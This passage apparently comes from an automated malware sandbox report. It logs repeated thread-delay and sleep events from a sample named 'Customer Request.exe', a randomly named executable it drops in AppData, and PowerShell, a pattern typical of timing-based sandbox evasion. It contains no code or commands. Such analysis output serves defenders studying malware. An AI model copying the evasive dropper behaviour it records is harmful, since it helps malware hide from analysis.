                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239421
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239310
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239202
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 239079
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 238959
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 599890
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 599598
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 599469
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 599354
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 599248
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 599123
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 599003
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598875
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598765
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598652
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598546
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598437
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598328
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598218
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598109
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 598000
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597890
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597781
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597672
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597562
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597453
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597343
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597234
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597125
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 597015
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 596896
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 596767
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 596625
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595953
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595828
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595719
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595608
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595500
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595390
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595281
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595172
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 595062
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594953
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594844
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594719
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594609
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594500
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594390
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594280
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594172
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 594062
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 593953
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 593826
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 593703
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeThread delayed: delay time: 593585
                  Source: C:\Users\user\Desktop\Customer Request.exeWindow / User API: threadDelayed 851Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeWindow / User API: threadDelayed 975Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6104Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1070Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6681Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1281Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeWindow / User API: threadDelayed 4569Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeWindow / User API: threadDelayed 5242Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeWindow / User API: foregroundWindowGot 1765Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeWindow / User API: threadDelayed 412
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeWindow / User API: threadDelayed 1332
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeWindow / User API: threadDelayed 2785
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exeWindow / User API: threadDelayed 7064
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -239843s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -239731s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -239624s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -239515s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -239406s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -239269s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -239140s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -238996s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -238848s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -238718s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -238437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -238031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -237484s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -237371s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -237218s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 1384Thread sleep time: -237062s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 2500Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3524Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3796Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6208Thread sleep count: 6681 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1736Thread sleep count: 1281 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6192Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4352Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -599891s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -599781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -599671s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -599562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -599451s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -599344s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -599235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -599110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -598985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -598860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -598735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -598610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -598485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -598360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -598235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -598110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -597985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -597860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -597736s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -597610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -597485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -597361s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -597167s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -597041s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -596640s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -596531s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -596422s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -596313s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -596188s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -596063s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -595938s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -595813s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -595703s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -595594s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -595469s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -595360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -595235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -595110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -594985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -594860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -594735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -594610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -594485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -594360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -594235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -594110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -593938s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -593799s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -593672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -593563s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exe TID: 7312Thread sleep time: -593438s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7284Thread sleep time: -6456360425798339s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7284Thread sleep time: -240000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7284Thread sleep time: -239870s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7284Thread sleep time: -239764s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7284Thread sleep time: -239640s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7284Thread sleep time: -239531s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7284Thread sleep time: -239421s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7284Thread sleep time: -239310s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7284Thread sleep time: -239202s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7284Thread sleep time: -239079s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7284Thread sleep time: -238959s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7260Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -31359464925306218s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -599890s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -599598s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -599469s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -599354s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -599248s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -599123s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -599003s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -598875s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -598765s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -598652s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -598546s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -598437s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -598328s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -598218s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -598109s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -598000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -597890s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -597781s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -597672s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -597562s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -597453s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -597343s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -597234s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -597125s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -597015s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -596896s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -596767s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -596625s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -595953s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -595828s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -595719s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -595608s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -595500s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -595390s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -595281s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -595172s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -595062s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -594953s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -594844s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -594719s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -594609s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -594500s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -594390s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -594280s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -594172s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -594062s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -593953s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -593826s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -593703s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe TID: 7512Thread sleep time: -593585s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 240000Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 239843Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 239731Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 239624Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 239515Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 239406Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 239269Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 239140Jump to behavior
                  Source: C:\Users\user\Desktop\Customer Request.exeThread delayed: delay time: 238996Jump to behavior
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 238848
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 238718
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 238437
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 238031
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 237484
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 237371
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 237218
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 237062
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 599891
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 599781
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 599671
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 599562
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 599451
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 599344
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 599235
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 599110
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 598985
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 598860
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 598735
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 598610
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 598485
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 598360
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 598235
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 598110
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 597985
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 597860
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 597736
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 597610
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 597485
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 597361
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 597167
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 597041
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 596640
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 596531
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 596422
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 596313
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 596188
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 596063
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 595938
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 595813
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 595703
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 595594
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 595469
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 595360
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 595235
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 595110
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 594985
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 594860
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 594735
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 594610
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 594485
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 594360
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 594235
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 594110
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 593938
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 593799
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 593672
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 593563
Source: C:\Users\user\Desktop\Customer Request.exe Thread delayed: delay time: 593438
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\gCFuOglEso.exe Thread delayed: delay time: 240000
